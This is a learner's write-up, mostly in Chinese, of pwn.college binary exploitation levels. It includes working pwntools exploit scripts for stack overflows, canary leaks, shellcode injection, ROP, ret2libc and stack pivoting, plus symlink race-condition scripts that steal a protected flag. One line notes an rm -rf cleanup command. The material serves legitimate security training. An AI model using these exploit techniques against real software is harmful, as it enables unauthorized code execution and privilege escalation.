噢虽然是随机的但是由于rand的特点(种子和flag有关), 每次的值都不会变, 这样子只要编写一些logic去brute force一些指令和值就可以了.

module 8-exp

时至2022年4月22日, c语言排名第二位, 历史最低为第二位. 大部分逆向工具反编译出的结果都是类C语言, 因为c语言是最接近汇编的语言, 还给了开发者一种使用高级语言而不是直接通过汇编去操作寄存器的选择, 被大量使用在操作系统和其他软件的代码中. 而c语言的内存完全控制所带来的问题在near future不会消失, 比如说一些嵌入式设备需要c语言来开发等等.

from pwn import *
r = gdb.debug('./balabala')
test_string = cyclic(128) 	# used to identify the location of overflow string
cyclic_find("gaaa")

stack canary mitigations:
- leak the canary.
- brute-force the canary(for forking processes)
- modify the canary.
- by forking processes, it can test repeatedly and figure out what the canary is.
- the canary begins with null-byte.
alsr mitigation:
- because all segments are aligned to 0x1000, so changing the least significant byte in a pointer can redirect the flow to another position.
- setarch x86_64 -R /bin/zsh command
uninitilized data.
- but gcc with high level optimization will probably remove the memset function, as it seems to be pointless.

整了pwndbg+tmux的组合视图, 感觉, 有一点点点点用吧…成功在tmux里面套娃screen.
使用gdb加上core文件 stackoverflow
- ulimit -c unlimited : 解除core dump文件大小限制, 或者直接加在zshrc里面.
- 然后gdb-pwndbg [filename] [coredump]
- 视频中使用了cyclic加上gdb core来查看返回地址从而发现buf的溢出位置.
- 也可以使用valgrind, 不过参数较多.
- pwn也有coredump函数.

level1-2

简单的忘记了

level3-4

修改返回地址.

level5

gdb 调试出现问题, read一个大数字就会bad address, 直接执行没有出现….

level6

重复利用堆栈, 修改返回地址后顺手改写rbp+0x4开始的四字节为0x1337(4919)

challenge堆栈有没有实用的位置, 应该就是对齐.

发现没啥特别的, 就是固定0x40000地址, 然后跳过win_auth的验证条件直接执行read flag

level7

和rev的18题差不多, 但是Yan85的open syscall被禁用. 他说有个memory error, 在哪里呢.

保护全关, 可执行栈. 根本没有open这个libc函数, 需要hijack shellcode, 注入到哪里呢?

发现了, 一个read到栈空间的调用没有检查边界:

不过要注意r2和r3只有1字节, 最多就是256.
反正各种保护都没开, 可以直接定位shellcode的位置. 总共长36字节.
shellcode得调用syscall, 还是用chmod简单点, shellcode就加在一开始的byte code中. 对shellcode进行Yan85译码可能会出问题, 在byte code结束之前还要修改r6的值来直接跳到指令的末尾.
Yan85 code直接从memory[1024]开始, 覆盖8B register, 9B stack space, 8B saved rbp, and finally, the retaddr to the position of shellcode.
- 还有一些细节, 覆盖r6的时候可以直接修改成256在下一次译码结束执行, 这样子就不用多余的操作修改r6.

level8

这题在上一题的基础之上加了canary和PIE.

其余部分应该是一样的, 溢出点也是一样的. 对了, write函数也没有边界检查, 可以利用这个来leak出canary和rbp.

level9

保护半开, 可用open, disallowed read_code, no bundary check in read, but write has.

只允许byte code中出现一次syscall.

但是发现read_memory的目的地变成了指令的区域. 于是就可以使用这个调用来输入新的代码去覆盖旧的.

level10

这次在上一题的基础上补上了read_memory的错误, 仍然只能用用一次syscall. 边界检查全开.

这???

level11

JIT pray, Yan85_64, 保护全开, 全新逻辑, 暂且放弃.

module 9-mem

nothing special.

level1

canary disabled.

inject shellcode to a map region, and then overwrite return address to jmp to executing shellcode.

level2

保护全关. 可执行栈. 确实没有什么东西, 没开PIE的话栈的位置都是一样的, shellcode注入的地点也可以使用绝对地址来确定.

level3

栈上的地址最低12位都是随机的. 怕不是每次运行的时候_start和__libc_start_main函数都会用到不同的栈空间大小…也许是aslr把stackbase也改了.
这下子只能连rbp都给leak出来了.

first exec challenge to leak canary and inject shellcode.
second exec to leak first challenge’s rbp, and then calc the shellcode position.
third exec to jmp to shellcode.

~~不对, 第一次leak canary的时候也可以leak出main的rbp,~~ 没事了, main的rbp可以用但没必要.

没有push imm64这条指令.
一开始用chmod+.ascii “flag”的做法, 发现自己加了一个空字符, 只能通过栈来尝试. 想了想, 栈指针加8也不会对第一个challenge的栈帧造成什么影响. 换成下面这个, 注意小端法.
[hex(ord(character)) for character in '/flag'] => ['0x2f', '0x66', '0x6c', '0x61', '0x67']
没料到手写shellcode会有一堆的空字符. 放弃手写, 转为pwntool生成.
size写太大, REPEAT后面的换行符都给读进去了.
招架不住canary和rbp里面也有空字符…多试几次就行了
IDA变量定义错了, 存在一个指向字符数组的指针, read参数还出现了对buf的解引用, 半天没看出来.

#buf在rbp-0x38的位置, canary在rbp-0x8
import sys
from pwn import * 
from glob import *
context.log_level = 'debug'
#binary = glob("/challenge/t*")[0]
binary = "./toddlerone_level3.1.elf64"
context.binary = binary
p = process(binary) 

#第一次leak canary
p.recvuntil("size: ")
p.sendline(b'57')
p.recvuntil("bytes)!\n")
shellcode=shellcraft.amd64.chmod('/flag', '0x04')
payload = asm(shellcode) 
payload = payload.ljust(0x40-8-6+1)
payload += b'REPEAT'
p.sendline(payload)
p.recvuntil(b'REPEAT')
canary = p.recv(7).rjust(8,b'\x00')
print(b'canary'+canary)

#第二次leak rbp
p.sendlineafter("size: ", b'64')
payload = b'b'*(0x40-6)+b'REPEAT'
p.sendlineafter("bytes)!\n", payload)
p.recvuntil(b'REPEAT')
rbp_byte = p.recv(6).ljust(8,b'\x00')
rbp = int.from_bytes(rbp_byte, byteorder='little')
print('rbp = '+hex(rbp))

#第三次执行shellcode.
p.sendlineafter("size: ", b'200')
payload = b'b'*0x38+canary+b'b'*8+p64(rbp-0x40)
p.sendlineafter("bytes)!\n", payload)

level4

看起来和上一题没有什么区别, 就是88字节的数组末尾8字节要是一个确定的数字才能正常return.

%s没有限制. executable stack.

1	`#几乎一样的代码, 不打出来了.`

level5

else repeat加了一个seccomp, 感觉又没什么区别.

level6

这下子真有区别了, seccomp在challenge返回的时候无法避免. 保护一样, 仍然是可执行栈.

只允许write和exit_group. 这是能做的吗? 一次load剩下的执行流程都会被限制.

没事了, 我连他的限制的内容也可以修改. 改成我想要的就行了. 总共允许两个syscall.

改成90 chmod 91 fchmod就行.

level7

加上了PIE. 利用随机地址仍然是4KB对齐来修改最后两个字节, 不过最高四位只能碰运气了(\x29中的’2’)

使用vim编辑二进制文件直接把非print字符整成一个问号存起来……换个办法修改好了…..
要么使用编辑器, 要么vim中使用set binary或-b参数, 然后%!xxd

1	`pl = b'b'*0x68 + b'\xa4\x29'`

level8

heap上malloc一个size区域, 七八十字节, 但是在这个区域中使用strlen, 在一堆ped中加入一个空字符即可.

而且加了PIE. 如同上一题的做法.

level9

保护全开. RELRO

最大的问题是开了canary.

嘶—-我知道了, 利用内存寻址可以跳过canary从而直接修改retaddr.

0x79下一个是0x80也是很可以. 下次写十六进制一定加前缀.

1	`pl = b'b'*92+b'\x77\x1a\x3f'`

level10

已经将flag读到了栈上, 为了printf的%s能够打印出来, 把buf前面110个字节填充为非零, 紧接着就是flag内容, 这样%s的打印就不会在110处停止.

1	`pl = b'b'*110`

level11

保护全开, 这题是mmap的使用, 以前还没看过详细的机制. youtube的一个视频, 还不错.

一连几个mmap都是没有address hint的, 全都连在一起. 而且是向低地址方向map, 最后map的region反而在低地址.

最后的map只指定了0x5c个字节, 不过还是分配了0x1000一整个page, 全为可写可读. 没搞懂的是为什么/flag映射的是只能执行也可以被printf读取出来..

所以结果也很简单, 0x3000字节即可.

level12

仍然是全开.

能重复执行challenge, 难不成是leak canary? 而且还有printf %s.

第一次0x19个(因为buf和canary之间有undefined区域)填充字符, leak出canary, 然后再次进入challenge
为了能跳转到win, 必须执行完challenge, 即通过canary验证. 第一次执行覆盖了canary第一字节必定不成功, 第二次利用leak出的canary来通过验证并且修改返回地址的低两字节.
这么一说感觉得用pwntools来写了.

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
while 1:
    p = process('./babymem_level12.1.elf64')

    p.sendline(b'25')
    pl = b'REPEAT'.rjust(0x20-8+1)
    p.sendline(pl)

    p.recvuntil(b'REPEAT')
    canary = p.recv(7).rjust(8,b'\x00')
    print(canary)
    p.sendline(b'42')
    pl = b'b'*0x18 + canary+b'b'*8+b'\xa4\x23'
    p.sendline(pl)                             

    all = p.recvall()
    if b'flag' in all:
        print(all)
        break	#一直试到成功为止.
    #break

level13

大满开!

重复利用没有清空的堆栈内容. flag在rbp-0x10f开始的0x100字节上. 所以在challenge栈帧中也从这个位置读取即可. 神奇的是有一大块空间没有被定义. 或许是定义了一个数组然后没有使用? 这样的话还不能被编译器优化掉.

v5从rbp-0x120开始, 填上0x20 byte is enough.

1
2
3

pl = b'b'*17                                                    
with open('/mnt/hgfs/LearingList/pwn.college/input', 'wb') as o:
    o.write(b'17\n'+pl)

level14

也是leak canary, the problem is printf() function limit the number of bytes to be output to 452, while buf size if 456 bytes.

………….

level15

TCP连接, 利用fork的特点来绕过canary.

1
2
3

tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
udp_socket = socket(AF_INET, SOCK_DGRAM, 0);
raw_socket = socket(AF_INET, SOCK_RAW, protocol);

https://docs.pwntools.com/en/stable/tubes/sockets.html, exempli gratia:

In [8]: import pwn 
   ...:  
   ...: pwn.context.encoding = "latin-1" 
   ...:  
   ...: with pwn.process("/challenge/babymem_level15.0") as target: 
   ...:     with pwn.remote("localhost", 1337) as remote: 
   ...:         remote.writeafter(b"Payload size:", b"100\n") 
   ...:         remote.writeafter(b"Send your payload", b"test") 
   ...:         pwn.info(remote.clean().decode()) 
   ...:                                                                                                                                                       
[x] Starting local process '/challenge/babymem_level15.0'
[+] Starting local process '/challenge/babymem_level15.0': pid 7046
[x] Opening connection to localhost on port 1337
[x] Opening connection to localhost on port 1337: Trying 127.0.0.1
[+] Opening connection to localhost on port 1337: Done
[*]  (up to 100 bytes)!
    You sent 4 bytes!
    Let's see what happened with the stack

module A-rop

ROP

rp++, ROPgadget.
- rp++ --unique -r2 -f /bin/bash | grep -P "(add|sub|mov) rax, r.."
store addresses into registers
stack pivot: 栈转移.
data transfer.
USE INFO IN THE STACK OR REGISTERS.

Counter-CFI(Control Flow Integrity) techniques:

B(lock)OP: ROP on a block (or multi-block) level by carefully compensating for side-effects.
J(ump)OP: instead of returns, use indirect jumps to control execution flow
C(all)OP: instead of returns, use indirect calls to control execution flow
S(ignreturn)ROP: instead of returns, use the sigreturn system call
D(ata)OP: instead of hijacking control flow, carefully overwrite the program’s data to puppet it

Intel Edition(endbr64 after ret instruction) is still bypassable by some advanced ROP techniques (Block Oriented Programming, SROP, etc), but it will significantly complicate exploitation.

Hacking blind:

The standard blind attack requires a forking service. 就像
Break ASLR and the canary byte-by-byte. Now we can redirect memory semi-controllably.
Redirect memory until we have a survival signal (i.e., an address that doesn’t crash).
Use the survival signal to find non-crashing ROP gadgets.
Find functionality to produce output.
Leak the program.
Hack it.

所谓的libc.so.6其实也就是一个符号链接. 如果要更改libc文件直接临时修改一下符号链接还要注意ld和libc的匹配问题. 或者使用patchelf改一下, 链接在这. (那个glibc_all_in_one就在这儿用的)(成天用的都是工具, 真想自己写一个)

YouTube-42视频是rop的新用法… pwntool还内置了rop. 真行啊.

level1

啥主要的保护也没开, 简单的覆盖返回地址.

level2

没开啥保护, 查了一下lseek的使用, 主要就是win函数分成了两个阶段, 一次读一半.

只要在栈上弄两个返回地址就行了. 简单

level3

5个stage, 每个stage都要有对应数字的参数, 简单跳过.

level4

有一整个函数用来提供gadgets.

利用这几个gadgets就可以实现chmod系统调用了. (或者execve)

rdi是’/flag’字符串的地址, 存在栈上. 鉴于栈空间会不断的减少, 就存在challenge的栈帧中.

好吧, 这栈地址会变化的. 大意了, 栈帧底部有一个变量.

from pwn import *
binary = './babyrop_level4.1.elf64'
context.binary = binary
context.log_level = 'debug'
p=process(binary)
p.recvuntil(b' at: 0x')
buf = int(p.recv(12), 16)
rbp = buf + 0x50
log.info(hex(rbp))
sc = '''
init-pwndbg
si
b *challenge+86
'''
#gdb.attach(p, gdbscript=sc)
pl = flat([b'/flag\x00'+b'b'*(0x50-6), 0, 0x4015fb, buf, 0x40161b, 4, 0x40160c, 90, 0x4015e3])
p.sendline(pl)
p.interactive()

level5

这一题在上一题的基础之上, 没有提示buf的所在位置.

突然想起来babyjail里面有一个openat. 我或许可以用fchmodat.

想出来了一个奇奇怪怪的方法, 在IDA中搜索到了字节序列'\x66\x00', 就是字符串f\0的表示,
在这之前要先使用ln -s /flag /home/hacker/f命令来创建符号链接, 再使用python来生成input,
最后再命令行中这样执行文件/challenge/babyrop_level5.1 <input 6<., 这样就行了.
或许可以使用别的字符串. 比如一些函数名.

from pwn import *
binary = './babyrop_level4.1.elf64'
context.binary = binary
context.log_level = 'debug'
#连续装四个参数和rax系统调用号.
pl = flat([b'b'*0x20, 0, 0x401d7b, 6, 0x401d63, 0x403EC8, 0x401d5c, 4, 0x401d54, 0, 0x401d74, 268, 0x401d8b])
open('./input', 'wb').write(pl)

想出来这个是因为不知道怎么leak栈上的地址, 估计下几个level得直接完蛋吧…….

~~看以前的ctf发现也许可以使用write函数来打印栈上的内容, 肯定有一个指向栈上的指针的. 比如说main的rbp.~~没事了, write的地址也得是指向栈的指针, 属于是鸡和蛋的问题, 暂时没有新方法.

level6

这次没有了syscall, 只有一个现成的函数force_import, gadget也少了几个. 不过也简单. 保护没有变化.

再加上challenge结束时的寄存器值:

这样的话只要改改rdi rsi. (open多参数到底有没有问题???)

但是rsi同时作为open的oflag和sendfile的in_fd, 按理来说open一般会开出来3, 那么oflag就得是3了, 但很明显不能是3, 这样标志位会有冲突. 那么用一个文件占用fd3, 这样就会开到4. 如果oflag是4的话会被识别为只读.
接下来就是rdi的问题, open的参数是一个指向字符串的地址(‘e’, null-terminal string at 0x400457), 还要被用在sendfile的out_fd中, 而fd是int类型, 加上文件固定低地址执行, 这样子还要在命令行中开一个fd为4195415(0x400457)的输出文件.

然后发现bash并不能打开超过9的fd. 由操作系统分配的fd, bash是怎么控制的? 为什么只提供0-9?

一次执行这个函数有困难也可以执行两次.

第一次open(‘e’, 4), send(‘f’, 4, 0, 0x7f……), sendfile失败.
第二次直接跳到sendfile(1, 3, 0, 60), 因为open函数会修改rdi rsi等等, 从函数入口开始执行的话ROP设置的寄存器值就失效了.

from pwn import *
binary = './babyrop_level4.1.elf64'
context.binary = binary
context.log_level = 'debug'
pl = flat([b'b'*(0x50+0x8), 0x401b6a, 0x400458, 0x401b82, 4, 0x401B3F])
pl+= flat([0x401b6a, 1, 0x401b82, 3, 0x401b7a, 0, 0x401b72, 60, 0x401B56, 0])
open('./input', 'wb').write(pl)

我开了aslr才能在gdb里面进行输入, 具体原因未知.
搞清楚了open的一些东西
- oflag用4字节中最低2bits表示, 按数值区别. mode参数只有在创建新文件的时候使用, 一般可忽略.
- libc中的open函数最终都会调用openat, 这样既能接受绝对地址也能接受相对地址.

level7

直接给我system函数的地址.

本地成功了, 现查system函数和/bin/sh字符串的偏移直接写出脚本, 但是远程不仅没法attach, 还不能strace, 明明就是那个偏移却运行不了. 难不成想让我用别的方法?

from pwn import *
binary = './babyrop_level7.1.elf64'
context.binary = binary
context.log_level = 'info'
#p = process('ltrace '+binary, shell=True)
p = process(binary)
p.recvuntil(b'is: 0x')
sys_addr = int(p.recv(12), 16)
log.info(hex(sys_addr))
binsh = sys_addr+0x13f112
sc = '''
b *challenge+0x63
'''
#gdb.attach(p, gdbscript=sc)
pl = flat([b'b'*(0x30+0x8), 0x401af3, binsh, sys_addr])
p.sendline(pl)
p.sendline(b'cat /flag')
p.recvall()

level8

本地成功了, 远程懒得试.

from pwn import *
binary = './babyrop_level8.1.elf64'
context.binary = binary
context.log_level = 'debug'
p = process(binary)
elf = ELF(binary)
#libc = ELF('./libc-2.31.so') 通过maps找到对应libc文件.
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.33.so') #本地测试libc文件.
pl = flat([b'b'*(0x80+8), 0x401b33, elf.got['puts'], elf.plt['puts'], elf.sym['challenge']])
sc = '''
b *challenge+0x39
'''
#gdb.attach(p, gdbscript=sc)
p.sendline(pl)
p.recvuntil(b'ving!\n')
puts = int.from_bytes(p.recv(6), byteorder='little')
base = puts - libc.sym['puts']
sys = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh'))
pl = flat([b'b'*(0x80+8), 0x401b33, binsh, sys])
p.sendline(pl)

p.interactive()

level9

stack pivot!!!!

以前做过了.

pop_rbp, bss_s^[1], challenge || leave_ret, 0(useless rbp), pop_rdi^[2] || got[puts], plt[puts]^[3], pop_rdi || str_binsh, system.

level10

开了PIE, 而且win是用mmap分配到一个随机的地址, 然后只给读和执行的权限, 所以主要利用的gadget还是在libc_csu_init里面的. 而aslr的开启导致stack的位置也是未知的.

~~由于gadget是在rodata段, ROPgadget无法分析, 所以在pwndbg中使用rop命令来分析mmap+mprotect后的区域.~~
~~注意只有最后3位是有用的.~~ rodata段是win函数, 通过mmap+memcpy复制到高地址空间中.

如果该段不可执行ropgadget也不会对这里进行分析.

不过在这一题中直接给出了buf的位置.

mmap的空间总是在ld共享库的上方, 和stack没有关联. 不过challeng中mmap的返回值就存在栈上, 也就是buf的上方8字节.
需要栈转移来将这个指针作为ret_address, 这样就可以直接跳到win.

因为有aslr, 所以gadget之间的数据需要固定一个值, 这个值可以在开了aslr的gdb中获取, 然后不断尝试直到新的一次第四位刚好和选中的值相等.

这次的幸运数字是0xd57000. 所有在ida看到的地址都要加上这一个偏移量.

from pwn import *
binary = './babyrop_level10.1.elf64'
context.binary = binary
context.log_level = 'debug'
while(True):
    p = process(binary)
    sc = '''
    b *challenge+0x109
    '''
    #gdb.attach(p, gdbscript=sc)
    p.recvuntil(b'located at: 0x')
    buf = int(p.recv(12), 16)
    pl = flat([b'b'*(0x88), buf-16, b'\x3b\x87'])

    p.send(pl)
    all = p.recvall()
    if b'flag' in all:
        break
    else: 
        p.kill()

远程跑总是有点问题, 没法调试. 懒得管了.

level11

和上一题一样, 不过challenge()函数的主逻辑前后都加上了超级多的nop作为填充. 这有啥用?

确实没有区别. 改一改偏移量就过了.

level12

保护没有变化. 这又有什么区别?? 0号程序还提供了win函数的地址, 这不白给么.

突然就不行了, 使用gdb的record来查找问题, 好像只能在当前执行过程中使用save和restore命令.
ROPgadget使用only命令的时候想要的命令要全部打出来, 而不仅是或的关系.
find /tmp -atime +5 -exec rm -rf {} + 还是别用了.
egrep '(pop (rbp|rsp))|leave' -a libc233.gadget ==
ROPgadget --binary /lib/x86_64-linux-gnu/libc-2.33.so --only 'pop|ret'

这题原来指的是从libc中进行ROP, 因为main函数返回到了高地址中的libc.so中.可以直接在libc文件中搜索可执行的ROP段.~~也不一定要leave, pop rsp不照样行.~~还是不行. 乖乖leave吧.

2.33中:

#0x000000000004e250 : leave ; ret
0x000000000002798b : pop rsp ; ret  
0x0000000000027e3f : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
0x0000000000027c27 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

2.31中:
1
2
0x00000000000578f8 : leave ; ret
0x00000000000c7ad3 : leave ; ret 0xfff6
main返回地址到libc偏移: 0x270b3

#这个是main函数的返回地址
pwndbg> vmmap 0x7efef009a7ed
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7efef0099000     0x7efef01e1000 r-xp   148000 26000  /usr/lib/x86_64-linux-gnu/libc-2.33.so +0x17ed
    
#到libc初始的偏移是`0x277ed`:
pwndbg> distance 0x7f6b0c0fb000 0x7f6b0c1227ed
	0x7f6b0c0fb000->0x7f6b0c1227ed is 0x277ed bytes (0x4efd words)

诶得16*16*16分之1的几率啊, 这也太低了点, 不过想不出来了, 就这么干. 0x254000+0x4e250=0x2A2250

~~又发现地址好像和libc没什么关系, 是紧挨着ld.so的…~~ 这个方向错了

exp:

from pwn import *
binary = './babyrop_level12.1.elf64'
context.binary = binary
context.log_level = 'info'
while(True):
    p = process(binary)
    sc = '''
    b *main+0x19f
    init-pwndbg
    lm
    '''
    #gdb.attach(p, gdbscript=sc)
    p.recvuntil(b'located at: 0x')
    buf = int(p.recv(12), 16)
    pl = flat([b'b'*(0x48), buf-16, b'\x50\x22\x2a'])

    p.send(pl)
    all = p.recvall()
    if b'flag' in all:
        print(all)
        break
    else:
        p.kill()

level13

看看这题又要搞什么幺蛾子.

保护全开, 给出buf位置, 可以leak任意一个地址上8字节数据.

???这不leak一个canary出来, 然后返回地址改成….和上一题一样了. ret2libc

level14

socket

module B-heap

key:

Dynamic Allocators:
- General Purpose: Doug Lea (pictured) releases dlmalloc into public domain in 1987.
- Linux: ptmalloc (Posix Thread aware fork of dlmalloc)
- FreeBSD: jemalloc (also used in Firefox, Android)
- Windows: Segment Heap, NT Heap
- Kernel allocators: kmalloc (Linux kernel memory allocator)kalloc (iOS kernel memory allocator)
managed by the brk and sbrk system calls:
- sbrk(NULL) returns the end of the data segment
- sbrk(delta) expands the end of the data segment by delta bytes
- brk(addr) expands the end of the data segment to addr

ubuntu 2004还在图中粗线框的阶段, 这是由于tcache的引入. 不过这个module并不会深入这个cache.

tcache:
- a caching layer for “small” allocations (<1032 bytes on amd64)
- makes a singly-linked-list using the first word of the free chunk
- very few security checks
setvbuf: scanf and printf will use malloc in themselves for buffering, we can use setvbuf(stdin/out, NULL) to disable it. (and avoiding confusion in heap exploitation.)
ptmalloc caches(for review):
- 64 singly-linked tcache bins for allocations of size 16 to 1032(functionally “covers” fastbins andsmallbins)
- 10 singly-linked “fast” bins for allocations of size up to 160 bytes
- 1 doubly-linked “unsorted” bin to quickly stash free()d chunks that don’t fit into tcache orfastbins
- 64 doubly-linked “small” bins for allocations up to 512 bytes
- doubly-linked “large” bins (anything over 512 bytes) that contain different-sized chunks
The Unlink Attack, Poison Null Byte
further reading.

malloc internals

the rise of houses

module C-race

key points

在一个程序打开文件并写入然后再到执行它的期间进程可能被调度, 这个时候如果文件被改写那么就会出现竞态条件.
如果这个窗口太短那么竞态条件出现的几率就会更小
有一个系统调用nice, 对应于nice命令, 还有一个ionice, 就是字面意思上的run a program with modified scheduling priority
通过非常长的路径搜索可以减慢程序执行, 进而加大竞态窗口. 可以使用符号链接来循环查找同一根目录下的多条长路径, 来达到同样的效果.

Mitigations
1. Safer programming practices (O_NOFOLLOW, mkstemp(), etc).
2. Symlink protections in /tmp
  a. root cannot follow symlinks in /tmp that are owned by other users
  b.specifically made to prevent these sorts of issues
非libc的库函数要直接进行编译要给gcc传递相应的链接参数.
pthread:
- pthread_t | pthread_create() | pthread_join():waits for the thread specified by thread to terminate.
- 实际用的是clone()系统调用.
discrepancies between libc call and raw syscall:
- setuid() in libc sets the uid for all threads of the process, raw syscall will only set the caller thread.
- exit() in libc will call exit_group(), so exit all threads, but raw syscall only exit caller thread.
实际中常使用全局变量来控制线程的执行.
对内存的读写同样会产生竞态条件.
Data races: 自增的多步骤指令. 不过可以通过上锁解决.
Detect: valgrind, 学术界
signals and reentrancy:
- use signal to interrupt normal execution control flow.
- use signal function to reenter function.
- DO NOT call non-reentrant funtions in your signal handlers.
  - Your handler might have interrupted those functions mid-execution.
  - Another signal might interrupt your signal handler’s non-reentrant invocations mid-execution!
  - Depending on settings (SA_NODEFER flag to sigaction()), another iteration of the same signal might interrupt your signal!
- man signal-safety to see all reentrant libc funtions.

YouTube-50是babyrace的视频. level5做不下去了准备看看.

补充:

level5 shell script问题出在rm mv都有一个启动时间和一堆系统调用, 再加上shell是靠fork+exec来执行进程的, 所以就会比较慢, 可能会出现左图中的情况, 就算把几个命令分开进多个循环也还是太慢. 如果写进c, 那就是右图中的理想状态了:
使用python的话启动比较慢是事实, 但是进入执行之后到系统调用层面是和c差不多的, 所以只要在python里面进行loop就能达到一样的效果. 想起来前几天看的dirty cow使用的race condition的poc就是用c写的.
- python的话要大量使用到os module来调用系统. 可得好好看看.(练了练shell也不亏就是了)

prepare

先整个创建超级长的路径的脚本. 顺便学了学shell编程.

难怪视频里只见到t_end, 因为这样路径上每个文件夹其实都是符号链接, 所以最多20个.

#!/bin/bash
prefix='a'
ln -s $(pwd) ./root
for i in {97..116}	#或者直接用{a..t}
do
    prefix=$(printf "\\x$(printf %x $i)")
    pushd .
    mkdir $prefix
    cd $prefix
    for j in {1..25}
    do
        mkdir ./$j
        cd ./$j
    done
    innerwd=$(pwd)
    popd
    cp -a ./root $innerwd
    ln -s $innerwd $(pwd)/${prefix}_end
done

生成路径字符串: 如果路径上还有符号链接那还得再减少几个.

#!/bin/bash
prefix='a'
path='./' 
for i in {97..116} 	#或者直接用{a..t}
do
    prefix=$(printf "\\x$(printf %x $i)")
    path+=${prefix}_end/root/

done
ls $path	#test path(though must be true...)
#result is:
./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/t_end/root/

level1

在程序使用第一个参数当做字符串open文件之前直接停下来等我, 这个时候就可以更改flag的符号链接为那个名字, 于是绕过了不能含有’flag’字符和不能是符号链接的限制.

.1程序的补充shell

#!/bin/bash
rm aa bb cc 2>/dev/null
touch aa
ln -s /flag ./cc
#一开始是一个普通文件, 然后改成到/flag的符号链接
while [ 1 ]
do
    #sleep 0.05 #不知道有没有用的说...希望有. 果然没用
    mv bb aa 
    sleep 0.0005
    mv aa bb
    mv cc aa
    sleep 0.0005
    mv aa cc
done

#!/bin/bash
#持续执行challenge的shell

path=./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/

while [[ 1 ]]
do
    res=$(/challenge/babyrace_level1.1 ${path}aa | grep 'pwn')
    if [ $res ]
    then
        printf "\n$res\n\n"
        exit
    fi
done

删除一堆文件夹:

1	`rm -r !(peda\|*sh)`

成功率比较

改成短路径之后进行了一下成功率比较:

比较shellscript:

#!/bin/bash
#持续执行challenge的shell

path=./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/
path_2=./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/
rate=0
rates=0
ratess=0
for i in {1..1000}
do
    res=$(/challenge/babyrace_level1.1 ${path}aa | grep 'pwn')
    if [ $res ]
    then
        ((rate++))
    fi

    res=$(/challenge/babyrace_level1.1 ${path_2}aa | grep 'pwn')
    if [ $res ]
    then
        ((ratess++))
    fi

    res=$(/challenge/babyrace_level1.1 ./aa | grep 'pwn')
    if [ $res ]
    then
        ((rates++))
    fi
done
echo longpath: $rate/1000
echo path_2: $ratess/1000
echo shortpath: $rates/1000

结果:

不带sleep:

带了sleep(0.05s):

和好多因素有关, 不过不用sleep看起来更高效, 但是没见到长路径带来的好处…….

好了, 有了新发现, 产生竞态条件的shell脚本中第一个sleep看起来没什么意义然后尝试删除, 成功率直接大幅上涨:

不过长路径还是没啥作用. 如果不加上sleep 0.0005, 那么成功率直降为5/1000.

会随着sleep的时间波动, 还是0.0005最高. 在0.005的时候出现path_2的成功率最高. 全都是迷之行为, 至于nice就不试了….

level2

完全一样

level3

在前两题的基础之上检查大小不能超过256字节, 而且在buf[256]之后有一个控制进入win()的v7, 改改文件名很容易绕过

看了office hours, 用了python的os模块, 尝试了os.fork+分开unlink和symlink+strace程序的系统调用时间并分析窗口(这个窗口比较小). 没试出来什么更好的结果.

level4

利用上面的方法更改打开文件进行栈溢出然后改跳转地址跳转到win().

什么保护都没开, 固定地址加载.

level5

思考的一些过程……

接受一个绝对路径, 除了一些检查(symlink, argname), 还有文件所在目录所有者只能是root, 其他用户没有在此文件夹写的权限.

???? 不过在看了看dirname的实现之后发现并不需要一个绝对路径.

这样的话, ~~参数就定成/home/hacker下的e(0 size file),~~

dirname()只是一个字符串操作, 会截取前面的一部分路径. 所以不能在参数中使用相对路径, 否则dirname会返回当前文件夹: ., 这样没法绕过dirname, 工作目录又不能改成除了hacker之外的.

第一阶段只判断了文件存在与否以及符号链接(no follow lstat), 第二阶段才判断目录信息(use dirname() strip argv[1], and follow link stat), 第三阶段是真正的打开文件.

首先touch一个/home/hacker/aa/bb文件, 通过name和symlink验证,
然后ln两个/home/hacker/aa -> /home, 不用管bb其实根本不在/home中.
最后再ln一个/home/hacker/aa/bb -> /flag

也许有更好的办法, :

最开始创建./1/aa/bb(plain file), ./2/aa -> /home, ./3/aa/bb -> /flag
然后创建一个symlink叫做dir.
首先指向./1, 然后指向./2, 最后指向./3.
这样只要每次unlink dir然后再symlink相应数字文件夹名就行了.
完整路径名为/home/hacker/dir/aa/bb
由于这样子实在太快导致窗口时间都跟不上了. 添加sleep, 大概是0.0001s

shell

写了一个脚本避免重复输入一些命令, 不过想清楚之后倒是一遍过了.

#!/bin/bash

if [ $1 == 'init' ]
then
    cd
    mkdir a
    cd a
    touch b
elif [ $1 == 2 ]
then
    cd
    mv a b
    ln -s /home /home/hacker/a
elif [ $1 == 3 ]
then
    cd
    rm a ./b/b
    mv b a
    ln -s /flag /home/hacker/a/b
elif [ $1 == 'cls' ]
then
    rm -r a b 2>/dev/null
else
    echo 'invalid argument'
fi

woc, 我就说怎么不太像竞态条件, 原来.0只是教学, .1都没有getchar()这个函数了.

重新做一下.

#!/bin/bash

rm aa bb cc -rf 2>/dev/null
mkdir aa
touch ./aa/bb
